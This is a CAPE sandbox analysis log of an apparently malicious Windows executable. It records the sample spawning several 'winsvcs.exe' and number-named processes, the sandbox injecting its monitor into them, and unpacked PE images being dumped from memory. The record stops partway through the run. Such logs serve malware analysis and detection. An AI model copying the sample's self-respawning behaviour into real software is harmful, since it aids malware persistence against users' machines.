Analysis

Category FILE
Package Extraction
Started 2019-01-10 03:39:35
Completed 2019-01-10 03:43:25
Duration 230 seconds
route = internet
procdump = 0
2019-01-10 03:39:36,015 [root] INFO: Date set to: 01-10-19, time set to: 03:39:36, timeout set to: 200
2019-01-10 03:39:36,015 [root] DEBUG: Starting analyzer from: C:\chdswdpfa
2019-01-10 03:39:36,015 [root] DEBUG: Storing results at: C:\EatnTMoHS
2019-01-10 03:39:36,030 [root] DEBUG: Pipe server name: \\.\PIPE\TEtoQNCa
2019-01-10 03:39:36,030 [root] INFO: Analysis package "Extraction" has been specified.
2019-01-10 03:39:36,421 [root] DEBUG: Started auxiliary module Browser
2019-01-10 03:39:36,467 [root] DEBUG: Started auxiliary module Curtain
2019-01-10 03:39:36,467 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2019-01-10 03:39:36,467 [root] DEBUG: Started auxiliary module DigiSig
2019-01-10 03:39:36,467 [root] DEBUG: Started auxiliary module Disguise
2019-01-10 03:39:36,467 [root] DEBUG: Started auxiliary module Human
2019-01-10 03:39:36,483 [root] DEBUG: Started auxiliary module Screenshots
2019-01-10 03:39:36,483 [root] DEBUG: Started auxiliary module Sysmon
2019-01-10 03:39:36,483 [root] DEBUG: Started auxiliary module Usage
2019-01-10 03:39:36,483 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2019-01-10 03:39:36,483 [root] INFO: Analyzer: Package modules.packages.Extraction does not specify a DLL_64 option
2019-01-10 03:39:36,670 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe" with arguments "" with pid 2952
2019-01-10 03:39:36,670 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:39:36,670 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:39:36,686 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2952
2019-01-10 03:39:38,697 [lib.api.process] INFO: Successfully resumed process with pid 2952
2019-01-10 03:39:38,697 [root] INFO: Added new process to list with pid: 2952
2019-01-10 03:39:38,744 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:39:38,744 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:39:38,744 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:39:38,776 [root] INFO: Monitor successfully loaded in process with pid 2952.
2019-01-10 03:39:44,720 [root] DEBUG: ProtectionHandler: Address: 0x51de28, RegionSize: 0x443a
2019-01-10 03:39:44,720 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x51de28
2019-01-10 03:39:44,720 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x51de28, AllocationSize: 0x443a, ThreadId: 0xb8c
2019-01-10 03:39:44,720 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x51de28 and Type=0x0.
2019-01-10 03:39:44,720 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x51de28, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:39:44,720 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x51de28
2019-01-10 03:39:44,736 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x51de28
2019-01-10 03:39:44,736 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x51de28.
2019-01-10 03:39:44,736 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x4f0000, size 0x32262).
2019-01-10 03:39:44,736 [root] DEBUG: DumpPEsInRange: Scanning range 0x4f0000 - 0x522262.
2019-01-10 03:39:44,736 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x4f0000-0x522262.
2019-01-10 03:39:44,736 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2952_73644391010412019
2019-01-10 03:39:44,736 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2952_73644391010412019
2019-01-10 03:39:44,736 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x51de28 - 0x522262.
2019-01-10 03:39:44,736 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x51de28.
2019-01-10 03:39:44,736 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x4f0000.
2019-01-10 03:39:44,736 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:39:44,736 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:39:44,736 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:39:44,736 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:39:44,736 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:39:44,736 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:39:44,736 [root] DEBUG: DumpProcess: Module entry point VA is 0x40612b
2019-01-10 03:39:44,750 [root] DEBUG: savePeFileToDisk: Name clash, trying to obtain new name...
2019-01-10 03:39:44,750 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2952_75144391010412019
2019-01-10 03:39:44,750 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:39:44,750 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:39:44,750 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:39:44,750 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:39:44,828 [root] INFO: Disabling sleep skipping.
2019-01-10 03:39:53,003 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 2908
2019-01-10 03:39:53,003 [root] INFO: Added new process to list with pid: 2908
2019-01-10 03:39:53,003 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:39:53,003 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:39:53,003 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2908
2019-01-10 03:39:53,019 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:39:53,019 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:39:53,019 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:39:53,019 [root] INFO: Disabling sleep skipping.
2019-01-10 03:39:53,019 [root] INFO: Monitor successfully loaded in process with pid 2908.
2019-01-10 03:39:53,533 [root] INFO: Notified of termination of process with pid 2952.
2019-01-10 03:39:53,940 [root] INFO: Process with pid 2952 has terminated
2019-01-10 03:39:58,790 [root] DEBUG: ProtectionHandler: Address: 0x4eddd0, RegionSize: 0x443a
2019-01-10 03:39:58,790 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x4eddd0
2019-01-10 03:39:58,790 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x4eddd0, AllocationSize: 0x443a, ThreadId: 0xb64
2019-01-10 03:39:58,790 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x4eddd0 and Type=0x0.
2019-01-10 03:39:58,822 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x4eddd0, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:39:58,838 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x4eddd0
2019-01-10 03:39:58,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x4eddd0
2019-01-10 03:39:58,838 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x4eddd0.
2019-01-10 03:39:58,838 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x4c0000, size 0x3220a).
2019-01-10 03:39:58,868 [root] DEBUG: DumpPEsInRange: Scanning range 0x4c0000 - 0x4f220a.
2019-01-10 03:39:58,868 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x4c0000-0x4f220a.
2019-01-10 03:39:58,868 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2908_86958391010412019
2019-01-10 03:39:58,900 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2908_86958391010412019
2019-01-10 03:39:58,900 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x4eddd0 - 0x4f220a.
2019-01-10 03:39:58,915 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x4eddd0.
2019-01-10 03:39:58,915 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x4c0000.
2019-01-10 03:39:58,931 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:39:58,931 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:39:58,947 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:39:58,947 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:39:58,947 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:39:58,947 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:39:58,963 [root] DEBUG: DumpProcess: Module entry point VA is 0x40612b
2019-01-10 03:39:58,977 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2908_96358391010412019
2019-01-10 03:39:58,977 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:39:58,977 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:39:58,977 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:39:58,977 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:22,065 [root] INFO: Announced 32-bit process name: 3895820593.exe pid: 2776
2019-01-10 03:40:22,065 [root] INFO: Added new process to list with pid: 2776
2019-01-10 03:40:22,065 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:22,065 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:22,065 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2776
2019-01-10 03:40:22,144 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:22,160 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:40:22,160 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:22,176 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:22,190 [root] INFO: Monitor successfully loaded in process with pid 2776.
2019-01-10 03:40:22,362 [root] DEBUG: ProtectionHandler: Address: 0x51d9d0, RegionSize: 0x43d1
2019-01-10 03:40:22,362 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x51d9d0
2019-01-10 03:40:22,362 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x51d9d0, AllocationSize: 0x43d1, ThreadId: 0xadc
2019-01-10 03:40:22,378 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x51d9d0 and Type=0x0.
2019-01-10 03:40:22,378 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x51d9d0, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:40:22,394 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x51d9d0
2019-01-10 03:40:22,410 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x51d9d0
2019-01-10 03:40:22,424 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x51d9d0.
2019-01-10 03:40:22,424 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x4f0000, size 0x31da1).
2019-01-10 03:40:22,456 [root] DEBUG: DumpPEsInRange: Scanning range 0x4f0000 - 0x521da1.
2019-01-10 03:40:22,456 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x4f0000-0x521da1.
2019-01-10 03:40:22,487 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2776_45622401010412019
2019-01-10 03:40:22,487 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2776_45622401010412019
2019-01-10 03:40:22,487 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x51d9d0 - 0x521da1.
2019-01-10 03:40:22,487 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x51d9d0.
2019-01-10 03:40:22,487 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x4f0000.
2019-01-10 03:40:22,487 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:40:22,487 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:40:22,487 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:40:22,519 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:40:22,519 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:40:22,519 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:40:22,519 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:40:22,533 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2776_51922401010412019
2019-01-10 03:40:22,533 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:40:22,549 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:40:22,549 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:40:22,549 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:24,671 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 3068
2019-01-10 03:40:24,671 [root] INFO: Added new process to list with pid: 3068
2019-01-10 03:40:24,671 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:24,687 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:24,717 [root] INFO: Announced 32-bit process name: 3180725230.exe pid: 2128
2019-01-10 03:40:24,717 [root] INFO: Added new process to list with pid: 2128
2019-01-10 03:40:24,717 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 3068
2019-01-10 03:40:24,717 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:24,717 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:24,717 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2128
2019-01-10 03:40:24,717 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:24,733 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:40:24,733 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:24,733 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:24,733 [root] INFO: Monitor successfully loaded in process with pid 3068.
2019-01-10 03:40:24,733 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:24,780 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x270000
2019-01-10 03:40:24,828 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:24,858 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:24,874 [root] INFO: Monitor successfully loaded in process with pid 2128.
2019-01-10 03:40:24,951 [root] DEBUG: ProtectionHandler: Address: 0x62e168, RegionSize: 0x43d1
2019-01-10 03:40:24,999 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x62e168
2019-01-10 03:40:25,046 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x62e168, AllocationSize: 0x43d1, ThreadId: 0x538
2019-01-10 03:40:25,140 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x62e168 and Type=0x0.
2019-01-10 03:40:25,140 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x62e168, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:40:25,186 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x62e168
2019-01-10 03:40:25,186 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x62e168
2019-01-10 03:40:25,233 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x62e168.
2019-01-10 03:40:25,233 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x600000, size 0x32539).
2019-01-10 03:40:25,233 [root] INFO: Notified of termination of process with pid 2776.
2019-01-10 03:40:25,233 [root] DEBUG: DumpPEsInRange: Scanning range 0x600000 - 0x632539.
2019-01-10 03:40:25,233 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x600000-0x632539.
2019-01-10 03:40:25,233 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\3068_23325401010412019
2019-01-10 03:40:25,233 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\3068_23325401010412019
2019-01-10 03:40:25,233 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x62e168 - 0x632539.
2019-01-10 03:40:25,249 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x62e168.
2019-01-10 03:40:25,249 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x600000.
2019-01-10 03:40:25,249 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:40:25,249 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:40:25,249 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:40:25,249 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:40:25,249 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:40:25,249 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:40:25,249 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:40:25,263 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\3068_24925401010412019
2019-01-10 03:40:25,263 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:40:25,263 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:40:25,263 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:40:25,263 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:25,404 [root] INFO: Process with pid 2776 has terminated
2019-01-10 03:40:32,611 [root] INFO: Announced 32-bit process name: 3971618177.exe pid: 2936
2019-01-10 03:40:32,690 [root] INFO: Added new process to list with pid: 2936
2019-01-10 03:40:32,783 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:32,954 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:33,079 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2936
2019-01-10 03:40:33,298 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:33,438 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:40:33,486 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:33,486 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:33,486 [root] INFO: Monitor successfully loaded in process with pid 2936.
2019-01-10 03:40:33,812 [root] DEBUG: ProtectionHandler: Address: 0x8dd9d0, RegionSize: 0x43d1
2019-01-10 03:40:33,812 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x8dd9d0
2019-01-10 03:40:33,812 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x8dd9d0, AllocationSize: 0x43d1, ThreadId: 0xb7c
2019-01-10 03:40:33,812 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x8dd9d0 and Type=0x0.
2019-01-10 03:40:33,812 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x8dd9d0, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:40:33,812 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x8dd9d0
2019-01-10 03:40:33,828 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x8dd9d0
2019-01-10 03:40:33,844 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x8dd9d0.
2019-01-10 03:40:33,844 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x8b0000, size 0x31da1).
2019-01-10 03:40:33,844 [root] DEBUG: DumpPEsInRange: Scanning range 0x8b0000 - 0x8e1da1.
2019-01-10 03:40:33,844 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x8b0000-0x8e1da1.
2019-01-10 03:40:33,859 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2936_84433401010412019
2019-01-10 03:40:33,859 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2936_84433401010412019
2019-01-10 03:40:33,859 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x8dd9d0 - 0x8e1da1.
2019-01-10 03:40:33,859 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x8dd9d0.
2019-01-10 03:40:33,859 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x8b0000.
2019-01-10 03:40:33,859 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:40:33,875 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:40:33,875 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:40:33,875 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:40:33,875 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:40:33,875 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:40:33,875 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:40:33,891 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2936_87633401010412019
2019-01-10 03:40:33,907 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:40:33,907 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:40:33,907 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:40:33,907 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:34,796 [root] INFO: Process with pid 3068 has terminated
2019-01-10 03:40:35,622 [modules.auxiliary.human] INFO: Found button "Close the program", clicking it
2019-01-10 03:40:35,950 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 2744
2019-01-10 03:40:35,950 [root] INFO: Added new process to list with pid: 2744
2019-01-10 03:40:35,950 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:35,950 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:35,966 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2744
2019-01-10 03:40:35,966 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:35,982 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:40:35,982 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:35,982 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:35,996 [root] INFO: Monitor successfully loaded in process with pid 2744.
2019-01-10 03:40:36,246 [root] DEBUG: ProtectionHandler: Address: 0x5fe168, RegionSize: 0x43d1
2019-01-10 03:40:36,246 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x5fe168
2019-01-10 03:40:36,246 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x5fe168, AllocationSize: 0x43d1, ThreadId: 0xa48
2019-01-10 03:40:36,262 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x5fe168 and Type=0x0.
2019-01-10 03:40:36,262 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x5fe168, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:40:36,262 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x5fe168
2019-01-10 03:40:36,278 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x5fe168
2019-01-10 03:40:36,278 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x5fe168.
2019-01-10 03:40:36,278 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x5d0000, size 0x32539).
2019-01-10 03:40:36,278 [root] DEBUG: DumpPEsInRange: Scanning range 0x5d0000 - 0x602539.
2019-01-10 03:40:36,293 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x5d0000-0x602539.
2019-01-10 03:40:36,293 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2744_29436401010412019
2019-01-10 03:40:36,309 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2744_29436401010412019
2019-01-10 03:40:36,325 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x5fe168 - 0x602539.
2019-01-10 03:40:36,325 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x5fe168.
2019-01-10 03:40:36,325 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x5d0000.
2019-01-10 03:40:36,325 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:40:36,325 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:40:36,325 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:40:36,325 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:40:36,325 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:40:36,339 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:40:36,339 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:40:36,355 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2744_34036401010412019
2019-01-10 03:40:36,355 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:40:36,355 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:40:36,355 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:40:36,355 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:36,480 [root] INFO: Notified of termination of process with pid 2936.
2019-01-10 03:40:36,823 [root] INFO: Process with pid 2936 has terminated
2019-01-10 03:40:43,532 [root] INFO: Announced 32-bit process name: 1015321578.exe pid: 2612
2019-01-10 03:40:43,594 [root] INFO: Added new process to list with pid: 2612
2019-01-10 03:40:43,703 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:43,875 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:43,983 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2612
